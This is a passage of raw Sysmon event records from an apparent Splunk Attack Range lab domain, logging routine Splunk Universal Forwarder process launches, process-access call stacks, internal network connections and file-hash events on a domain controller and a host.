Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104864Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.675{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-711A-60CA-2C13-00000000CF01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104863Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.673{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104862Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.673{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104861Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.672{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104860Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.672{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104859Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.672{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-711A-60CA-2C13-00000000CF01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104858Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.672{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-711A-60CA-2C13-00000000CF01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104857Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.672{54715871-711A-60CA-2C13-00000000CF01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104856Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:00.791{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55413-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000104855Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:02.177{54715871-7119-60CA-2B13-00000000CF01}13208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151298Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:02.910{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=439A8704E53FC6DC95DD5659CDA4A9E0,SHA256=323A24887D86A7D51F2D7FFFBDFF1DA2354F5F40113D82927C5B1E6F55D7219B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151297Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:00.892{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58394-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151296Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:02.092{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D891D752D718B7B45F7A54FABB001A62,SHA256=935AF0BD12FB75194DC05881690DF93AFA07C3AFF7C021A470EF98ADB2DE64D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151295Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:02.090{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=226EC8D12335599C0552FB2661ED3E75,SHA256=35AB6427E6278C77FC813564A1EE53E834DA72C6C9A8DA0115249943542EE8BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104876Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.521{54715871-FD28-60C9-3000-00000000CF01}2448NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104875Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.517{54715871-711B-60CA-2D13-00000000CF01}37404460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104874Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.358{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B979BAECF9E9069B9655F8017AFFF29D,SHA256=814ECB1A6FD89F02C4635BE2C7203402C434EDD308CD038D235D7767779CC039,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104873Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.358{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-711B-60CA-2D13-00000000CF01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104872Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.353{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104871Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.353{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104870Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.353{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104869Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.352{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104868Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.352{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-711B-60CA-2D13-00000000CF01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104867Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.352{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-711B-60CA-2D13-00000000CF01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104866Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:03.352{54715871-711B-60CA-2D13-00000000CF01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000151299Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:03.911{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBDDC393E337DC9142AF5AB25B9C6132,SHA256=B31C9A4CEF4BAB94A0A23A962925027FAF2B3778295A9E3A979589EA3AF9E9A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104887Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.750{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=248F9DF32C9A43ADA2BCD2222F7EDE2E,SHA256=34DD615F019D2DB582DB19A181F1603DD78955DCB455CD127B2BD56D5AD81F37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104886Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.193{54715871-711C-60CA-2E13-00000000CF01}43286944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104885Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.036{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-711C-60CA-2E13-00000000CF01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104884Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.034{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104883Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.034{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104882Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:04.034{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104881Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 